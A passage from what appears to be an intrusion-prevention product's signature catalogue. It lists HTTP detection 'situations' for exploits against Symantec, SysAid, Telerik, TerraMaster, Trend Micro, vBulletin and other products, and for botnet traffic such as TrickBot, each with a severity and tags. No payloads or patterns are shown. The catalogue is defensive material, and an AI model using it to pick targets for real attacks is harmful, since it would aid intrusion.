About this situation: An attempt to exploit a vulnerability in Symantec IM Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec IM Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-986-5242
Vulnerability: Symantec-IM-Manager-Multiple-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution

About this situation: An attempt to exploit a vulnerability in Symantec IM Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec IM Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution
Description:
Back to top

HTTP_CSU-Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection
Description:
Back to top

HTTP_CSU-Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Vulnerability: Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution
Description:
Back to top

HTTP_CSU-SysAid-Help-Desk-Administrator-Account-Creation

About this situation: An attempt to exploit a SysAid Help Desk Administrator Account Creation vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SysAid, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1258-5242
Vulnerability: SysAid-Help-Desk-Administrator-Account-Creation
Description:
Back to top

HTTP_CSU-SysAid-Help-Desk-File-Disclosure

About this situation: An attempt to exploit a SysAid Help Desk File Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SysAid, CVE2015, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Vulnerability: SysAid-Help-Desk-File-Disclosure
Description:
Back to top

HTTP_CSU-SysAid-On-Premise-Directory-Traversal-CVE-2023-47246

About this situation: An attempt to exploit a vulnerability in SysAid
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SysAid, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1831-5242
Vulnerability: SysAid-On-Premise-Directory-Traversal-CVE-2023-47246
Description:
Back to top

HTTP_CSU-Syssfic-Trojan-Infection-Traffic

About this situation: Syssfic trojan infection traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Vulnerability: Syssfic-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CSU-System-File-Disclosure

About this situation: Detects attempts to access system files
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2011, CVE2012, CVE2013, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1732-5242
Vulnerability: HTTP_System-File-Access
Advantech-WebAccess-Directory-Traversal
QLogic-SANsurfer-FC-HBA-Manager-Directory-Traversal
Sophos-Web-Appliance-Directory-Traversal
GE-Proficy-CIMPLICITY-WebView-Directory-Traversal
TP-Link-Directory-Traversal
Axigen-Free-Mail-Server-Directory-Traversal
Bitweaver-Overlay_Type-Directory-Traversal
Yaws-Web-Server-Directory-Traversal
Cisco-Network-Admission-Control-Directory-Traversal
Indusoft-Web-Studio-Remote-File-Access
Description:
Back to top

HTTP_CSU-System-Management-Homepage-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP System Management Homepage (SMH) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP System Management Homepage, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-530-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: HP-System-Management-Homepage-Command-Injection
Description:
Back to top

HTTP_CSU-Tandberg-Directory-Traversal-File-Disclosure

About this situation: An attempt to exploit a directory traversal vulnerability in Tandberg VCS
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Tandberg Video Communication Server, CVE2009, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-1621-5242
Vulnerability: Tandberg-Video-Server-Directory-Traversal
Description:
Back to top

HTTP_CSU-Taterf.B-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Worm.Taterf.B-Botnet
Description:
Back to top

HTTP_CSU-Telerik-UI-File-Upload-CVE-2017-11317

About this situation: An attempt to exploit a vulnerability in Telerik UI
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Telerik UI, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Telerik-UI-File-Upload-CVE-2017-11317
Description:
Back to top

HTTP_CSU-Telerik-UI-For-ASP.NET-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Telerik UI For ASP.NET detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Telerik UI, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Telerik-UI-For-ASP.NET-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422

About this situation: An attempt to exploit a vulnerability in Telesquare Router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Telesquare Router, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422
Description:
Back to top

HTTP_CSU-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839

About this situation: An attempt to exploit a vulnerability in TerraMaster TOS detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, TerraMaster TOS, CVE2021, Unix not specific, Linux not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839
Description:
Back to top

HTTP_CSU-TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188

About this situation: An attempt to exploit a vulnerability in TerraMaster TOS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, TerraMaster TOS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188
Description:
Back to top

HTTP_CSU-Thanksgiving-iTunes-Malware

About this situation: Possible Thanksgiving iTunes malware detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Thanksgiving-iTunes-Malware
Description:
Back to top

HTTP_CSU-ThinkPHP-Local-File-Inclusion-CVE-2022-47945

About this situation: An attempt to exploit a vulnerability in ThinkPHP detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ThinkPHP, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: ThinkPHP-Local-File-Inclusion-CVE-2022-47945
Description:
Back to top

HTTP_CSU-Thomson-TWG850-4-Unauthenticated-Backup-File-Access

About this situation: An attempt to exploit a vulnerability in Thomson TWG850-4
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Thomson TWG850-4, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Thomson-TWG850-4-Unauthenticated-Backup-File-Access
Description:
Back to top

HTTP_CSU-Tidserv-Bot-Traffic

About this situation: Tidserv Bot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1706-5242
Vulnerability: Tidserv-Bot
Description:
Back to top

HTTP_CSU-Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686

About this situation: An attempt to exploit a vulnerability in Titan MFT Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Titan MFT Server, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Vulnerability: Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686
Description:
Back to top

HTTP_CSU-Tomato-Trojan-Infection-Traffic

About this situation: Tomato trojan infection traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1357-5242
Last changed: sgpkg-ips-1357-5242
Vulnerability: Tomato-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CSU-Too-Large-URI-Scheme

About this situation: The scheme part of the uri is too long.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, CVE2004, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Check-Point-Firewall-1-HTTP-Parsing-Format-String-Vulnerabilities
Description:
Back to top

HTTP_CSU-Totolink-Routers-Multiple-Command-Injection-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Totolink detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Totolink, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: Totolink-Routers-Multiple-Command-Injection-Vulnerabilities
Description:
Back to top

HTTP_CSU-TP-Link-Local-File-Disclosure-CVE-2015-3035

About this situation: An attempt to exploit a vulnerability in TP-Link routers detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2015, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1831-5242
Vulnerability: TP-Link-Local-File-Disclosure-CVE-2015-3035
Description:
Back to top

HTTP_CSU-Treasure-Data-Digdag-Getfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Treasure Data Digdag detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Digdag, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Treasure-Data-Digdag-Getfile-Directory-Traversal
Description:
Back to top

HTTP_CSU-Trend-Micro-Control-Manager-Download.php-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-857-5242
Vulnerability: Trend-Micro-Control-Manager-Download.php-Information-Disclosure
Description:
Back to top

HTTP_CSU-Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection
Description:
Back to top

HTTP_CSU-Trend-Micro-Imsva-Management-Portal-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Messaging Security (Virtual Appliance), CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1045-5242
Vulnerability: Trend-Micro-Imsva-Management-Portal-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Messaging Security (Virtual Appliance), CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Vulnerability: Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure
Description:
Back to top

HTTP_CSU-Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Vulnerability: Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection
Description:
Back to top

HTTP_CSU-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Client_Info-Slink_Id-SQL-Injection
Description:
Back to top

HTTP_CSU-Trend-Micro-Scanmail-File-Disclosure

About this situation: Access to sensitive files used by Trend Micro ScanMail
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Trend Micro ScanMail, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: Trend-Micro-Scanmail-File-Disclosure
Description:
Back to top

HTTP_CSU-TrickBot-C2-Traffic

About this situation: Trickbot C2 traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: TrickBot-C2-Traffic
Description:
Back to top

HTTP_CSU-Trihedral-Vtscada-Wap-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Trihedral VTScada detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trihedral VTScada, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1639-5242
Vulnerability: Trihedral-Vtscada-Wap-Directory-Traversal
Description:
Back to top

HTTP_CSU-Trihedral-Vtscada-Wap-Filter-Bypass

About this situation: An attempt to exploit a vulnerability in Trihedral VTScada detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Trihedral VTScada, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Trihedral-Vtscada-Wap-Filter-Bypass
Description:
Back to top

HTTP_CSU-Tstisapi-DLL-BOF

About this situation: Access to vulnerable dll and shellcode detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, John Roy Pi3Web, CVE2001, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-158-2032
Vulnerability: Tstisapi-DLL-BOF
Description:
Back to top

HTTP_CSU-TWiki-Configure-Script-TYPEOF-Parameter-Command-Execution-2

About this situation: Detects Perl code execution exploits against TWiki
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, TWiki, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330

About this situation: An attempt to exploit a vulnerability in Ubiquiti Networks AirOS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ubiquiti Networks AirOS, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1473-5242
Last changed: sgpkg-ips-1473-5242
Vulnerability: Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330
Description:
Back to top

HTTP_CSU-UltraVNC-Vnclog-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in UltraVNC Project UltraVNC detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, UltraVNC, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: UltraVNC-Vnclog-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Unicode-LRO-Character

About this situation: Detected an attempt to use LRO character
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Vulnerability: Unicode-Formatting-Control-Characters
Description:
Back to top

HTTP_CSU-Unicode-RLO-Character

About this situation: Detected an attempt to use RLO character
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Vulnerability: Unicode-Formatting-Control-Characters
Description:
Back to top

HTTP_CSU-Unix-File-Deletion-In-URI

About this situation: A local path in the URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Description:
Back to top

HTTP_CSU-Upload.cgi-Detect

About this situation: Upload.cgi
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-442-4219
Vulnerability: Nikto-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CSU-VBulletin-Forumdisplay-Php-Script-Execution

About this situation: Attempt to execute arbitrary script via vBulletin forumdisplay.php
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: VBulletin-Formudisplay-Php-Script-Execution
Description:
Back to top

HTTP_CSU-VBulletin-PHP-Object-Injection

About this situation: An attempt to exploit a VBulletin PHP Object Injection vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: VBulletin-PHP-Object-Injection
Description:
Back to top

HTTP_CSU-VBulletin-Routestring-Unauthenticated-Remote-Code-Execution

About this situation: An attempt to exploit a VBulletin Routestring Unauthenticated Remote Code Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: VBulletin-Routestring-Unauthenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Version-Control-Configuration-Access

About this situation: An attempt to access a version control system's metafile detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Version-Control-Metafile-Access
Description:
Back to top

HTTP_CSU-Vertexnet-Bot-Activity

About this situation: VertexNet Bot activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Vertexnet-Bot
Description:
Back to top

HTTP_CSU-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, VideoLAN VLC, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-229-3038
Vulnerability: VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
Description:
Back to top

HTTP_CSU-VMware-Server-Directory-Traversal

About this situation: An attempt to exploit a VMware Server Directory Traversal vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware Server, CVE2009, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: VMware-Server-Directory-Traversal
Description:
Back to top

HTTP_CSU-VMware-Vcenter-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in VMware vCenter detected
Context: HTTP Request URI
Severity: 7
